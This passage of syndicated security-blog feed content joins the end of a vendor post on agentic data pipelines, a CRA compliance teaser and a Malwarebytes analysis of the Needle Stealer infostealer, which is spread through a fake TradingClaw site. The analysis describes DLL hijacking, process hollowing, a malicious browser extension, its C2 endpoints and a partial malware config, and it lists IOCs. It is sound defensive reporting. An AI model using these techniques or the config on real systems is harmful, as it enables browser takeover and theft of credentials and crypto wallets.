evaluation before automation.</p><h4><strong>Step 4: Define Governance and Policy Frameworks</strong></h4><p>Establish clear rules for what actions can be automated and what requires human approval. Start with strict controls and gradually allow low-<a href="https://www.ishir.com/strategic-advisory-services.htm">risk autonomous actions</a>. Governance is critical to ensure safe and compliant operations.</p><h4><strong>Step 5: Enable the Autonomous Pipeline Loop</strong></h4><p>Activate the full observe-reason-act-remember loop with controlled autonomy. Allow agents to execute approved actions, learn from outcomes, and continuously improve. Conduct regular audits to ensure decisions remain aligned with business intent and policies.</p><h2>How ISHIR Helps You Build Agentic Data Pipelines</h2><p>ISHIR helps organizations transition from traditional data pipelines to agentic, AI-driven systems by combining Agentic AI development with deep data engineering expertise. We design and build intelligent agents, modernize pipeline architectures, and integrate observability, orchestration, and self-healing capabilities to create scalable, autonomous data platforms aligned with business outcomes.</p><p>Beyond implementation, ISHIR enables real business impact through advanced <a href="https://www.ishir.com/data-analytics.htm">data analytics</a> and hands-on <a href="https://www.ishir.com/data-ai-acceleration.htm">Data + AI workshops</a>. We help teams unlock actionable insights, define clear adoption roadmaps, and build internal capability to manage and scale agentic systems with confidence and control.</p><div class="ctaThreeWrapper"> <div class="ctaThreeContent"> <div class="ctaThreeConList"> <div class="content"> <h2 data-start="0" data-end="101">Struggling with fragile data pipelines, constant failures, and manual fixes slowing your team down?</h2> <p>ISHIR helps you build AI-powered, self-healing data pipelines that automate operations and scale with confidence.</p> <div class="linkWrapper"><a href="https://www.ishir.com/get-in-touch.htm" rel="noopener">Get Started</a></div> </div> </div> </div> </div><h2>FAQs on Agentic Data Pipelines and AI-Driven Data Engineering</h2><h4><strong>Q. What is an agentic data pipeline and how is it different from traditional pipelines?</strong></h4><p>An agentic data pipeline is an AI-driven system that can observe, reason, act, and learn without constant human intervention. Unlike traditional pipelines that follow fixed workflows, agentic pipelines adapt dynamically to changes in data, schema, and system conditions. They do not just execute tasks, they make decisions based on context and intent. This shift reduces manual debugging, improves reliability, and enables real-time optimization. It is a move from static automation to intelligent autonomy.</p><h4><strong>Q. How do AI agents actually improve data pipeline reliability?</strong></h4><p>AI agents improve reliability by continuously monitoring system health and data quality, then taking corrective action instantly. Instead of waiting for alerts and manual fixes, they identify root causes and resolve issues such as failures, anomalies, or schema changes in real time. They also learn from past incidents, which means recurring problems are handled faster and more accurately. This significantly reduces downtime, data inconsistencies, and operational overhead.</p><h4><strong>Q. Are agentic data pipelines safe to use in production environments?</strong></h4><p>Yes, but only when implemented with strong governance frameworks. Most organizations start with limited autonomy where agents suggest actions instead of executing them. Over time, low-risk actions like retries or scaling are automated, while critical changes still require approval. Every action is logged, traceable, and aligned with policy rules. This controlled approach ensures safety, compliance, and trust while gradually increasing automation.</p><h4><strong>Q. What are the main challenges in adopting agentic pipelines?</strong></h4><p>The biggest challenges are trust, governance, and system integration. Teams often hesitate to allow AI systems to modify production data without oversight. There is also complexity in integrating AI agents with existing orchestration, monitoring, and data systems. Another challenge is defining clear intent and policies so agents can make correct decisions. Successful adoption requires a phased approach with validation, monitoring, and gradual rollout.</p><h4><strong>Q. Do agentic pipelines replace data engineers?</strong></h4><p>No, they change the role of data engineers rather than replacing them. Engineers move from writing and fixing pipelines to designing systems, defining policies, and supervising AI agents. They focus more on architecture, governance, and optimization instead of repetitive operational tasks. This shift increases productivity and allows teams to handle larger, more complex data environments with fewer resources.</p><h4><strong>Q. What tools are commonly used to build AI-driven data pipelines?</strong></h4><p>The ecosystem includes agentic platforms like Databricks Genie Code and Snowflake Cortex, orchestration tools like Airflow and Dagster, and observability tools like Monte Carlo and OpenTelemetry. Transformation tools such as dbt combined with AI agents automate modeling and SQL generation. Governance tools ensure compliance, while vector databases store memory for learning. These tools work together to enable intelligent, autonomous pipeline behavior.</p><h4><strong>Q. How can organizations start implementing agentic data pipelines today?</strong></h4><p>The best approach is to start small and build progressively. Begin with AI-assisted development to speed up pipeline creation, then implement automated data quality monitoring. Introduce agentic systems in a suggestion mode to validate their decisions before enabling automation. Define governance policies early to control risk. Once trust is established, gradually activate full autonomy with continuous monitoring and audits. This phased strategy ensures safe and effective adoption.</p><p>The post <a href="https://www.ishir.com/blog/320917/agentic-data-pipelines-the-shift-to-autonomous-data-engineering.htm">Agentic Data Pipelines: The Shift to Autonomous Data Engineering</a> appeared first on <a href="https://www.ishir.com/">ISHIR | Custom AI Software Development Dallas Fort-Worth Texas</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/agentic-data-pipelines-the-shift-to-autonomous-data-engineering/" data-a2a-title="Agentic Data Pipelines: The Shift to Autonomous Data Engineering"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fagentic-data-pipelines-the-shift-to-autonomous-data-engineering%2F&amp;linkname=Agentic%20Data%20Pipelines%3A%20The%20Shift%20to%20Autonomous%20Data%20Engineering" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fagentic-data-pipelines-the-shift-to-autonomous-data-engineering%2F&amp;linkname=Agentic%20Data%20Pipelines%3A%20The%20Shift%20to%20Autonomous%20Data%20Engineering" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fagentic-data-pipelines-the-shift-to-autonomous-data-engineering%2F&amp;linkname=Agentic%20Data%20Pipelines%3A%20The%20Shift%20to%20Autonomous%20Data%20Engineering" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fagentic-data-pipelines-the-shift-to-autonomous-data-engineering%2F&amp;linkname=Agentic%20Data%20Pipelines%3A%20The%20Shift%20to%20Autonomous%20Data%20Engineering" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fagentic-data-pipelines-the-shift-to-autonomous-data-engineering%2F&amp;linkname=Agentic%20Data%20Pipelines%3A%20The%20Shift%20to%20Autonomous%20Data%20Engineering" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.ishir.com/">ISHIR | Custom AI Software Development Dallas Fort-Worth Texas</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Naresh Kumar">Naresh Kumar</a>. Read the original post at: <a href="https://www.ishir.com/blog/320917/agentic-data-pipelines-the-shift-to-autonomous-data-engineering.htm">https://www.ishir.com/blog/320917/agentic-data-pipelines-the-shift-to-autonomous-data-engineering.htm</a> </p>

<p>The post <a href="https://www.sonatype.com/blog/the-time-is-now-to-prepare-for-cra-enforcement">The Time Is Now to Prepare for CRA Enforcement</a> appeared first on <a href="https://www.sonatype.com/blog">2024 Sonatype Blog</a>.</p><div class="hs-featured-image-wrapper"> <a href="https://www.sonatype.com/blog/the-time-is-now-to-prepare-for-cra-enforcement" title="" class="hs-featured-image-link"> <img decoding="async" src="https://www.sonatype.com/hubfs/blog_cra_enforcements.jpg" alt="Image of a network of hexagon shapes each containing different icons, one with a checkmark, one with a checkbox, one with a lock, one with a human formone with a circle of stars." class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"> </a> </div><p style="background-color: #ffffff;">When t<span style="text-decoration: none;">he </span><a href="https://www.sonatype.com/resources/guides/eu-cyber-resilience-act-guide" style="text-decoration: none;">EU Cyber Resilience Act (CRA)</a><span style="text-decoration: none;"> wa</span>s introduced into law in 2024, it represented one of the most significant regulatory shifts we’ve seen anywhere in the world with implications for how organizations build, ship, and maintain software. It establishes cybersecurity requirements for hardware and software products sold within the European Union or produced by organizations operating in the EU, and is among the first international legislation focused on cybersecurity requirements. It was also par<span style="text-decoration: none;">t of a </span><a href="https://www.sonatype.com/resources?category=158041693505" style="text-decoration: none;">wave of global regulations</a><span style="text-decoration: none;"> th</span>at put the security of software supply chains in the spotlight.</p><p><img decoding="async" src="https://track.hubspot.com/__ptq.gif?a=1958393&amp;k=14&amp;r=https%3A%2F%2Fwww.sonatype.com%2Fblog%2Fthe-time-is-now-to-prepare-for-cra-enforcement&amp;bu=https%253A%252F%252Fwww.sonatype.com%252Fblog&amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/the-time-is-now-to-prepare-for-cra-enforcement/" data-a2a-title="The Time Is Now to Prepare for CRA Enforcement"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fthe-time-is-now-to-prepare-for-cra-enforcement%2F&amp;linkname=The%20Time%20Is%20Now%20to%20Prepare%20for%20CRA%20Enforcement" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fthe-time-is-now-to-prepare-for-cra-enforcement%2F&amp;linkname=The%20Time%20Is%20Now%20to%20Prepare%20for%20CRA%20Enforcement" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fthe-time-is-now-to-prepare-for-cra-enforcement%2F&amp;linkname=The%20Time%20Is%20Now%20to%20Prepare%20for%20CRA%20Enforcement" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fthe-time-is-now-to-prepare-for-cra-enforcement%2F&amp;linkname=The%20Time%20Is%20Now%20to%20Prepare%20for%20CRA%20Enforcement" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fthe-time-is-now-to-prepare-for-cra-enforcement%2F&amp;linkname=The%20Time%20Is%20Now%20to%20Prepare%20for%20CRA%20Enforcement" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.sonatype.com/blog">2024 Sonatype Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Aaron Linskens">Aaron Linskens</a>. Read the original post at: <a href="https://www.sonatype.com/blog/the-time-is-now-to-prepare-for-cra-enforcement">https://www.sonatype.com/blog/the-time-is-now-to-prepare-for-cra-enforcement</a> </p>

<p>The post <a href="https://www.malwarebytes.com/blog/threat-intel/2026/04/malicious-trading-website-drop-malware-that-hands-over-your-browser-to-attackers">Malicious trading website drops malware that hands your browser to attackers</a> appeared first on <a href="https://www.malwarebytes.com/">Malwarebytes</a>.</p><p>During our threat hunting, we found a campaign using the same malware loader from <a href="https://www.malwarebytes.com/blog/threat-intel/2026/04/from-fake-proton-vpn-sites-to-gaming-mods-this-windows-infostealer-is-everywhere)" rel="noreferrer noopener">our previous research</a> to deliver a different threat: <strong>Needle Stealer</strong>, data-stealing malware designed to quietly harvest sensitive information from infected devices, including browser data, login sessions, and cryptocurrency wallets.</p><p>In this case, attackers used a website promoting a tool called <strong>TradingClaw</strong> (<code>tradingclaw[.]pro</code>), which claims to be an AI-powered assistant for TradingView. </p><p>TradingView is a legitimate platform used by traders to analyze financial markets, but this fake TradingClaw site is not part of TradingView, nor is it related to the legitimate startup <code>tradingclaw[.]chat</code>. Instead, it’s being used here as a lure to trick people into downloading malware.</p><h2 class="wp-block-heading" id="h-what-is-needle-stealer">What is Needle Stealer?</h2><p>Needle is a modular infostealer written in Golang. In simple terms, that means it’s built in pieces, so attackers can turn features on or off depending on what they want to steal.</p><p>According to its control panel, Needle includes:</p><ul class="wp-block-list"> <li><strong>Needle Core</strong>: The main component, with features like form grabbing (capturing data you enter into websites) and clipboard hijacking</li> <li><strong>Extension module</strong>: Controls browsers, redirects traffic, injects scripts, and replaces downloads</li> <li><strong>Desktop wallet spoofer</strong>: Targets cryptocurrency wallet apps like Ledger, Trezor, and Exodus</li> <li><strong>Browser wallet spoofer</strong>: Targets browser-based wallets like MetaMask and Coinbase, including attempts to extract seed phrases</li> </ul><p>The panel also shows a “coming soon” feature to generate fake Google or Cloudflare-style pages, suggesting the attackers plan to expand into more advanced phishing techniques.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="778" height="488" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-Needle-Panel.png" alt="Needle Stealer panel" class="wp-image-402735"><figcaption class="wp-element-caption"><em>Needle Stealer panel</em></figcaption></figure><p id="h-in-this-blog-post-we-analyze-the-distribution-of-the-stealer-through-a-fake-website-related-to-an-ai-service-called-tradingclaw-we-have-detected-that-the-same-stealer-is-also-distributed-by-other-malware-such-as-amadey-and-gcleaner">In this article, we analyze the distribution of the stealer through a fake website related to an AI service called <strong>TradingClaw</strong>. We have detected that the same stealer is also distributed by other malware such as Amadey and GCleaner. </p><h2 class="wp-block-heading" id="h-analysis-of-the-tradingclaw-campaign">Analysis of the TradingClaw campaign</h2><p>In this campaign, the malware is distributed through a fake website advertising TradingClaw as an AI trading tool.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="972" height="522" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-1.jpeg" alt="Malicious TradingClaw website" class="wp-image-402739"><figcaption class="wp-element-caption"><em>Malicious TradingClaw website</em></figcaption></figure><p>The site itself behaves selectively. In some cases, visitors are shown the fake TradingClaw page, while in others they are redirected to a different site (<code>studypages[.]com</code>). This kind of filtering is commonly used by attackers to avoid detection and only show the malicious content to intended targets. Search engines, for example, see the Studypages version:</p><figure class="wp-block-image aligncenter size-large"><img decoding="async" loading="lazy" height="205" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-studypages.png?w=1024" alt="Studypages fake page" class="wp-image-402741"><figcaption class="wp-element-caption"><em>Google results shows the Studypages fake page</em></figcaption></figure><p>If a user proceeds, they are prompted to download a ZIP file. This file contains the first stage of the infection chain.</p><p>Like in the previous campaign, the attack relies on a technique called DLL hijacking. In simple terms, this means the malware disguises itself as a legitimate file that a trusted program will load automatically. When the program runs, it unknowingly executes the malicious code instead.</p><p>In this case, the DLL loader (named <code>iviewers.dll</code>) is executed first. It then loads a second-stage DLL, which ultimately injects the Needle Stealer into a legitimate Windows process (<code>RegAsm.exe</code>) using a technique known as process hollowing.</p><figure class="wp-block-image aligncenter size-large"><img decoding="async" loading="lazy" height="308" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-RegAsmprocess.png?w=1024" alt="Needle Stealer injected in RegAsm.exe process" class="wp-image-402746"><figcaption class="wp-element-caption"><em>Needle Stealer injected in RegAsm.exe process</em></figcaption></figure><p>The stealer is developed in Golang, and most of the functions are implemented in the “ext” package. </p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="345" height="533" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-exepackage.png" alt="Part of the “exe” package" class="wp-image-402747"><figcaption class="wp-element-caption"><em>Part of the “exe” package</em></figcaption></figure><h2 class="wp-block-heading">What the malware does</h2><p>Once installed, the Needle core module can:</p><ul class="wp-block-list"> <li>Take screenshots of the infected system</li> <li>Steal browser data, including history, cookies, and saved information</li> <li>Extract data from apps like Telegram and FTP clients</li> <li>Collect files such as .txt documents and wallet data</li> <li>Steal cryptocurrency wallet information</li> </ul><p>One of the more concerning features is its ability to install malicious browser extensions.</p><h2 class="wp-block-heading">Malicious browser extensions</h2><p>The stealer also supports the distribution of malicious browser extensions, giving attackers a powerful way to take control of the victim’s browser.</p><p>We identified multiple variations of these extensions, each with slightly different file structures and components. Behind the scenes, the malware uses built-in Golang features to unpack a hidden ZIP archive (often named <code>base.zip</code> or <code>meta.zip</code>) that contains the extension files, along with a configuration file (<code>cfg.json</code>). </p><p>Partial <code>cfg.json</code> config file:</p><pre class="wp-block-code"><code>{ "extension_host": {}, "api_key": "… "server_url": "https://C2/api/v2", "self_destruct": true, "base_extension": true, "ext_manifest": { "account_extension_type": 0, "active_permissions": { "api": [ "history", "notifications", "storage", "tabs", "webNavigation", "declarativeNetRequest", "scripting", "declarativeNetRequestWithHostAccess", "sidePanel" ], "explicit_host": [ "&lt;all_urls&gt;" ], "manifest_permissions": [], "scriptable_host": [ "&lt;all_urls&gt;" ] }, "commands": { "_execute_action": { "was_assigned": true } }, …</code></pre><p class="has-text-align-center" style="font-size:16px"> </p><p>This configuration file is key. It tells the malware where to send stolen data (the command-and-control server), which malicious extension to install, and which features to enable.</p><p>The stealer extension is dropped in a random folder in the path <code>%LOCALAPPDATA%\Packages\Extensions</code>. The folder contains three main files <code>popup.js</code>, <code>content.js</code>, and <code>background.js</code>.   </p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="990" height="355" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-extension.png" alt="The malicious extension dropped" class="wp-image-402758"><figcaption class="wp-element-caption"><em>The malicious extension dropped</em></figcaption></figure><p>The extensions analyzed have Google-related names.</p><figure class="wp-block-image aligncenter size-full"><img decoding="async" loading="lazy" width="895" height="736" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/04/trading-claw-GO-translate.png" alt="The fake malicious extension on Edge Browser" class="wp-image-402759"><figcaption class="wp-element-caption"><em>The fake malicious extension on Edge Browser</em></figcaption></figure><h2 class="wp-block-heading" id="h-what-the-malicious-extensions-can-do">What the malicious extensions can do</h2><p>The extension gives attackers near full control over the browser, with capabilities that go far beyond typical malware.</p><p>It can:</p><ul class="wp-block-list"> <li><strong>Connect to a remote server</strong> using a built-in API key and regularly check in for instructions. It can also switch to backup domains if the main server goes offline.</li> <li><strong>Generate a unique ID</strong> to track the infected user over time.</li> <li><strong>Collect full browsing history</strong> and send it to a remote server (<code>/upload</code>).</li> <li><strong>Monitor what you’re doing in real time</strong>, including which sites you visit, and apply attacker-controlled redirect rules. This allows it to silently send you to different websites or alter what you see on a page, including injecting or hiding content.</li> <li><strong>Intercept downloads</strong>, cancel legitimate files, and replace them with malicious ones from attacker-controlled servers.</li> <li><strong>Inject scripts directly into web pages</strong>, enabling further data theft or manipulation.</li> <li><strong>Display fake browser notifications</strong> with attacker-controlled text and images.</li> </ul><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">How it communicates with attackers</h2><p>The stealer and its extension communicate with command-and-control (C2) servers using several API endpoints. These are essentially different “channels” used for specific tasks:</p><ul class="wp-block-list"> <li><code>/backup-domains/active</code>—retrieves backup servers to stay connected if the main one is blocked</li> <li><code>/upload</code>—sends stolen data back to the attackers</li> <li><code>/extension</code>—receives instructions for redirects, downloads, and notifications</li> <li><code>/scripts</code>—downloads malicious code to inject into web pages</li> </ul><h2 class="wp-block-heading">How to stay safe</h2><p>Scammers are increasingly using AI-themed tools to make fake websites look legitimate. In this case, a supposed “AI trading assistant” was used to trick people into installing malware.</p><p>To reduce your risk:</p><ul class="wp-block-list"> <li><strong>Download software only from official websites</strong>. If a tool claims to work with a well-known platform, check the platform’s official site to confirm it’s real.</li> <li><strong>Check who created the file before running it</strong>. Look at the publisher name and avoid anything that looks unfamiliar or inconsistent.</li> <li><strong>Review your browser extensions regularly</strong>. Remove anything you don’t recognize, especially extensions you didn’t knowingly install.</li> </ul><h2 class="wp-block-heading" id="h-what-to-do-if-you-think-you-ve-been-affected">What to do if you think you’ve been affected</h2><p>If you think you may have downloaded this infostealer:</p><ul class="wp-block-list"> <li>Check EDR and firewall logs for communications with the C2s listed in the IOCs part.</li> <li>From a different, clean device, sign out of every active session on your important accounts: Google, Microsoft 365, any banking portal, GitHub, Discord, Telegram, Steam, and your crypto exchange. Change all passwords and enable 2FA for accounts you have accessed from this machine.</li> <li>Check the folder <code>%LOCALAPPDATA%\Packages\Extensions</code> and suspicious browser extensions.</li> <li>If you have cryptocurrency wallets on the machine, move the funds from a clean device immediately. This is what these operators monetize first.</li> <li><a href="https://www.malwarebytes.com/solutions/virus-scanner" rel="noreferrer noopener">Run a full scan with Malwarebytes</a>.</li> </ul><h2 class="wp-block-heading" id="h-indicators-of-compromise-iocs">Indicators of Compromise (IOCs)</h2><p><strong>HASH</strong></p><p><code>95dcac62fc15e99d112d812f7687292e34de0e8e0a39e4f12082f726fa1b50ed</code></p><p><code>0d10a6472facabf7d7a8cfd2492fc990b890754c3d90888ef9fe5b2d2cca41c0</code></p><p><strong>Domains</strong></p><p><code>Tradingclaw[.]pro</code>: fake website</p><p><code>Chrocustumapp[.]com</code>: related to malicious extension</p><p><code>Chrocustomreversal[.]com</code>: related to malicious extension</p><p><code>google-services[.]cc</code>: related to malicious extension</p><p><code>Coretest[.]digital</code>: C2 panel</p><p><code>Reisen[.]work</code>: C2 panel</p><p><strong>IPs</strong></p><p><code>178[.]16[.]55[.]234</code>: C2 panel</p><p><code>185[.]11[.]61[.]149</code>: C2 panel</p><p><code>37[.]221[.]66[.]27</code>: C2 panel</p><p><code>2[.]56[.]179[.]16</code>: C2 panel</p><p><code>178[.]16[.]54[.]109</code>: C2 panel</p><p><code>37[.]221[.]66[.]27</code>: C2 panel</p><p><code>209[.]17[.]118[.]17</code>: C2 panel</p><p><code>162[.]216[.]5[.]130</code>: C2 panel</p><hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide"><p><strong>We don’t just report on threats—we remove them</strong></p><p>Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by <a href="https://www.malwarebytes.com/for-home">downloading Malwarebytes today</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/malicious-trading-website-drops-malware-that-hands-your-browser-to-attackers/" data-a2a-title="Malicious trading website drops malware that hands your browser to attackers"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fmalicious-trading-website-drops-malware-that-hands-your-browser-to-attackers%2F&amp;linkname=Malicious%20trading%20website%20drops%20malware%20that%20hands%20your%20browser%20to%20attackers" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fmalicious-trading-website-drops-malware-that-hands-your-browser-to-attackers%2F&amp;linkname=Malicious%20trading%20website%20drops%20malware%20that%20hands%20your%20browser%20to%20attackers" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fmalicious-trading-website-drops-malware-that-hands-your-browser-to-attackers%2F&amp;linkname=Malicious%20trading%20website%20drops%20malware%20that%20hands%20your%20browser%20to%20attackers" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fmalicious-trading-website-drops-malware-that-hands-your-browser-to-attackers%2F&amp;linkname=Malicious%20trading%20website%20drops%20malware%20that%20hands%20your%20browser%20to%20attackers" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fmalicious-trading-website-drops-malware-that-hands-your-browser-to-attackers%2F&amp;linkname=Malicious%20trading%20website%20drops%20malware%20that%20hands%20your%20browser%20to%20attackers" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.malwarebytes.com/">Malwarebytes</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Malwarebytes">Malwarebytes</a>. Read the original post at: <a href="https://www.malwarebytes.com/blog/threat-intel/2026/04/malicious-trading-website-drop-malware-that-hands-over-your-browser-to-attackers">https://www.malwarebytes.com/blog/threat-intel/2026/04/malicious-trading-website-drop-malware-that-hands-over-your-browser-to-attackers</a> </p>

The 2022 LastPass breach was a wake-up call. I realized that even with an encrypted vault, I could still be at risk if my vault lives on servers outside my control. It may have taken a few years, bu… [+7109 chars]